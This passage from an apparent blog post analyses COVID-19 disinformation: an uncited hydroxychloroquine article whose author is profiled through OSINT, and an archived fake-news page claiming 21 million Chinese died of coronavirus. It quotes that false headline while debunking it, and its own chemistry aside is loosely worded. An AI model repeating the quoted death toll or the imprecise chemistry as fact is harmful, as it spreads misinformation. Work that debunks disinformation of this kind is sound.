https://substackcdn.com/image/fetch/$s_!Kdur!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe879cb4-ef10-41af-aedf-a9441385f1d5_800x602.png 1272w, https://substackcdn.com/image/fetch/$s_!Kdur!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe879cb4-ef10-41af-aedf-a9441385f1d5_800x602.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Internet Archive entry for Sample 1 (1 of 2)</figcaption></figure></div><blockquote><p><strong>Disclaimer: I am not a doctor or a trained medical, pharmaceutical, or chemistry professional. This analysis is from the perspective of language and the methods by which this article is shared on the internet.</strong></p></blockquote><p>In evaluating this article, there is no single link to anything, much less a reputable source or medical journal. A user on <a href="https://news.ycombinator.com/item?id=22803280">YCombinator</a> pointed out that the author responded to criticism about failing to link any material with &#8220;<em>I&#8217;m not an academic so f**k all that citation waste of time</em>&#8221;. The language of the section is written to the layperson initially but then starts to pick up in the use of medical terminology. As we scroll down in the subject sample, we see this:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!HMcg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2d9b2d76-8004-466d-a1d4-34a104329703_800x636.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!HMcg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2d9b2d76-8004-466d-a1d4-34a104329703_800x636.png 424w, https://substackcdn.com/image/fetch/$s_!HMcg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2d9b2d76-8004-466d-a1d4-34a104329703_800x636.png 848w, https://substackcdn.com/image/fetch/$s_!HMcg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2d9b2d76-8004-466d-a1d4-34a104329703_800x636.png 1272w, https://substackcdn.com/image/fetch/$s_!HMcg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2d9b2d76-8004-466d-a1d4-34a104329703_800x636.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!HMcg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2d9b2d76-8004-466d-a1d4-34a104329703_800x636.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/2d9b2d76-8004-466d-a1d4-34a104329703_800x636.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!HMcg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2d9b2d76-8004-466d-a1d4-34a104329703_800x636.png 424w, https://substackcdn.com/image/fetch/$s_!HMcg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2d9b2d76-8004-466d-a1d4-34a104329703_800x636.png 848w, https://substackcdn.com/image/fetch/$s_!HMcg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2d9b2d76-8004-466d-a1d4-34a104329703_800x636.png 1272w, https://substackcdn.com/image/fetch/$s_!HMcg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2d9b2d76-8004-466d-a1d4-34a104329703_800x636.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Internet Archive entry for Sample 1 (2 of 2)</figcaption></figure></div><p>The language used here is not that of someone in the medical or chemistry fields. The statement that Hydroxychloroquine is an advanced descendent of regular old Chloroquine is false. The difference is the chemical makeup. Hydroxychloroquine has the same composition as Chloroquine with an additional Oxygen atom (C18H26ClN3O for Hydroxycholorquine versus C18H26CIN3). The difference between the two is in the manufacturing of the drugs, not something that occurs organically in nature.</p><p>Why is this relevant when discussing disinformation?</p><p>Not only is this &#8216;article&#8217; disinformation, but Medium also took it down and suspended the user (as evidenced below). <em>Note: To test this, remove the archive.org URL up to the https:// that starts the Medium URL.</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!-len!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb922fe69-f21e-4385-aa94-1ebacc4192df_800x565.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!-len!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb922fe69-f21e-4385-aa94-1ebacc4192df_800x565.png 424w, https://substackcdn.com/image/fetch/$s_!-len!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb922fe69-f21e-4385-aa94-1ebacc4192df_800x565.png 848w, https://substackcdn.com/image/fetch/$s_!-len!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb922fe69-f21e-4385-aa94-1ebacc4192df_800x565.png 1272w, https://substackcdn.com/image/fetch/$s_!-len!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb922fe69-f21e-4385-aa94-1ebacc4192df_800x565.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!-len!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb922fe69-f21e-4385-aa94-1ebacc4192df_800x565.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/b922fe69-f21e-4385-aa94-1ebacc4192df_800x565.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!-len!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb922fe69-f21e-4385-aa94-1ebacc4192df_800x565.png 424w, https://substackcdn.com/image/fetch/$s_!-len!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb922fe69-f21e-4385-aa94-1ebacc4192df_800x565.png 848w, https://substackcdn.com/image/fetch/$s_!-len!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb922fe69-f21e-4385-aa94-1ebacc4192df_800x565.png 1272w, https://substackcdn.com/image/fetch/$s_!-len!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb922fe69-f21e-4385-aa94-1ebacc4192df_800x565.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">A live Medium page for Sample 1</figcaption></figure></div><p>So, I decided to see what credentials the user has to discuss medicine and COVID. Using OSINT, I was able to find their social media accounts, which I am not going to share in preserving their privacy. This is a censored screenshot of their Twitter:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!4kCX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe51f0691-9600-4ca7-9093-dba8e36abfaf_583x113.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!4kCX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe51f0691-9600-4ca7-9093-dba8e36abfaf_583x113.png 424w, https://substackcdn.com/image/fetch/$s_!4kCX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe51f0691-9600-4ca7-9093-dba8e36abfaf_583x113.png 848w, https://substackcdn.com/image/fetch/$s_!4kCX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe51f0691-9600-4ca7-9093-dba8e36abfaf_583x113.png 1272w, https://substackcdn.com/image/fetch/$s_!4kCX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe51f0691-9600-4ca7-9093-dba8e36abfaf_583x113.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!4kCX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe51f0691-9600-4ca7-9093-dba8e36abfaf_583x113.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/e51f0691-9600-4ca7-9093-dba8e36abfaf_583x113.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!4kCX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe51f0691-9600-4ca7-9093-dba8e36abfaf_583x113.png 424w, https://substackcdn.com/image/fetch/$s_!4kCX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe51f0691-9600-4ca7-9093-dba8e36abfaf_583x113.png 848w, https://substackcdn.com/image/fetch/$s_!4kCX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe51f0691-9600-4ca7-9093-dba8e36abfaf_583x113.png 1272w, https://substackcdn.com/image/fetch/$s_!4kCX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe51f0691-9600-4ca7-9093-dba8e36abfaf_583x113.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Sample 1&#8217;s Author&#8217;s Twitter (censored)</figcaption></figure></div><p>When I attempted a search on Facebook for the author by name, instead of seeing an account, I was confronted with numerous posts debunking his research, similar to this article. I am embedding one post that is from someone claiming to be a Medical Doctor (MD) with a Master of Science (MSci). A search for her on LinkedIn confirms the information she presents about herself on the Facebook page. I was also able to find her profile on one of the employers that the LinkedIn profile claims to work for, so I rate her as credible.</p><p>Here is a picture of the screen I was presented with while searching for the author:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_cmI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd6fd876-8f0d-4d94-8524-7c60025c8b50_645x774.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_cmI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd6fd876-8f0d-4d94-8524-7c60025c8b50_645x774.png 424w, https://substackcdn.com/image/fetch/$s_!_cmI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd6fd876-8f0d-4d94-8524-7c60025c8b50_645x774.png 848w, https://substackcdn.com/image/fetch/$s_!_cmI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd6fd876-8f0d-4d94-8524-7c60025c8b50_645x774.png 1272w, https://substackcdn.com/image/fetch/$s_!_cmI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd6fd876-8f0d-4d94-8524-7c60025c8b50_645x774.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_cmI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd6fd876-8f0d-4d94-8524-7c60025c8b50_645x774.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/cd6fd876-8f0d-4d94-8524-7c60025c8b50_645x774.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_cmI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd6fd876-8f0d-4d94-8524-7c60025c8b50_645x774.png 424w, https://substackcdn.com/image/fetch/$s_!_cmI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd6fd876-8f0d-4d94-8524-7c60025c8b50_645x774.png 848w, https://substackcdn.com/image/fetch/$s_!_cmI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd6fd876-8f0d-4d94-8524-7c60025c8b50_645x774.png 1272w, https://substackcdn.com/image/fetch/$s_!_cmI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd6fd876-8f0d-4d94-8524-7c60025c8b50_645x774.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Facebook results for searching for the Author of Sample 1</figcaption></figure></div><h4>Sample 1 Conclusion:</h4><p>This piece is written to further a political narrative. The author has no credibility and is deliberately trying to spread disinformation. I am not sure to what end, but some of the posts on Facebook do mention that this is making its rounds on 4Chan. A few Google dorks across 4chan yielded a high number of results of the link to this sample, but no other COVID-19 specific posts, as verified from implementing a filter that excluded results for the sample in question.</p><p>Whether the author is the source of spreading the archive.org link or not is undetermined. Using LinkedIn, I was able to identify the author, but I was unable to find any evidence that they are the source of sharing the archive.org link. I was able to ascertain that the author is active in supporting political candidates that <em><strong>may</strong></em> subscribe to the narrative of this sample.</p><h3>Sample 2</h3><p>Sample 2 is a lot more complicated. <strong>Warning: There is a rabbit hole to fall with this one. </strong>From my estimation, this is more likely to come from a state-sponsored actor that Sample 1. There are a lot of moving parts to unpack. Let&#8217;s start the same way we did with Sample 1. Here is the link being shared:</p><p><strong><a href="https://web.archive.org/web/20200406190917/https://n5ti.com/health/1233/" title="https://web.archive.org/web/20200406190917/https://n5ti.com/health/1233/">21 million Chinese died of coronavirus &#8212; US intelligence officials intercept data &#8212; Washington Live</a></strong><a href="https://web.archive.org/web/20200406190917/https://n5ti.com/health/1233/" title="https://web.archive.org/web/20200406190917/https://n5ti.com/health/1233/"><br></a><em><a href="https://web.archive.org/web/20200406190917/https://n5ti.com/health/1233/" title="https://web.archive.org/web/20200406190917/https://n5ti.com/health/1233/">A new data intercepted by the United States reveals that 21 million people died in China from December 2019 to March&#8230;</a></em><a href="https://web.archive.org/web/20200406190917/https://n5ti.com/health/1233/" title="https://web.archive.org/web/20200406190917/https://n5ti.com/health/1233/">web.archive.org</a></p><p>Here is what we see by clicking the link:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!IFO4!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a574645-83d8-47a8-93ee-85f53f1a0551_800x483.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!IFO4!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a574645-83d8-47a8-93ee-85f53f1a0551_800x483.png 424w, https://substackcdn.com/image/fetch/$s_!IFO4!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a574645-83d8-47a8-93ee-85f53f1a0551_800x483.png 848w, https://substackcdn.com/image/fetch/$s_!IFO4!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a574645-83d8-47a8-93ee-85f53f1a0551_800x483.png 1272w, https://substackcdn.com/image/fetch/$s_!IFO4!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a574645-83d8-47a8-93ee-85f53f1a0551_800x483.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!IFO4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a574645-83d8-47a8-93ee-85f53f1a0551_800x483.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/9a574645-83d8-47a8-93ee-85f53f1a0551_800x483.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!IFO4!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a574645-83d8-47a8-93ee-85f53f1a0551_800x483.png 424w, https://substackcdn.com/image/fetch/$s_!IFO4!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a574645-83d8-47a8-93ee-85f53f1a0551_800x483.png 848w, https://substackcdn.com/image/fetch/$s_!IFO4!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a574645-83d8-47a8-93ee-85f53f1a0551_800x483.png 1272w, https://substackcdn.com/image/fetch/$s_!IFO4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a574645-83d8-47a8-93ee-85f53f1a0551_800x483.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Internet Archive entry for Sample 2 (1 of 2)</figcaption></figure></div><p>The portions that are highlighted (less the number of captures in the top left corner) were searched for on the internet in an attempt to find a reputable news source that reports any semblance of this; however, that was unsuccessful. A site that attempts to look like a TV station was identified and will be discussed below. Attempts to verify the information contained in this article were futile, less some of the fundamental facts, such as the parts about facial recognition and the decline in phone users. All sites that had similar statements to this one and none were reputable. I came across another site, similar to the one mentioned above, which will also be discussed below.</p><p>When navigating to the live site, I saw this:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!I5OI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc34949b2-eb41-4e4b-9724-26ed98a138c2_800x502.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!I5OI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc34949b2-eb41-4e4b-9724-26ed98a138c2_800x502.png 424w, https://substackcdn.com/image/fetch/$s_!I5OI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc34949b2-eb41-4e4b-9724-26ed98a138c2_800x502.png 848w, https://substackcdn.com/image/fetch/$s_!I5OI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc34949b2-eb41-4e4b-9724-26ed98a138c2_800x502.png 1272w, https://substackcdn.com/image/fetch/$s_!I5OI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc34949b2-eb41-4e4b-9724-26ed98a138c2_800x502.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!I5OI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc34949b2-eb41-4e4b-9724-26ed98a138c2_800x502.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/c34949b2-eb41-4e4b-9724-26ed98a138c2_800x502.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!I5OI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc34949b2-eb41-4e4b-9724-26ed98a138c2_800x502.png 424w, https://substackcdn.com/image/fetch/$s_!I5OI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc34949b2-eb41-4e4b-9724-26ed98a138c2_800x502.png 848w, https://substackcdn.com/image/fetch/$s_!I5OI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc34949b2-eb41-4e4b-9724-26ed98a138c2_800x502.png 1272w, https://substackcdn.com/image/fetch/$s_!I5OI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc34949b2-eb41-4e4b-9724-26ed98a138c2_800x502.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Internet Archive entry for Sample 2 (2 of 2)</figcaption></figure></div><p>First of all, notice the WordPress logo on the tab in the absolute top left corner. Any reputable news site would have their logo instead of WordPress. I would like to say that many large news outlets have their content management system provided by their parent company. Still, 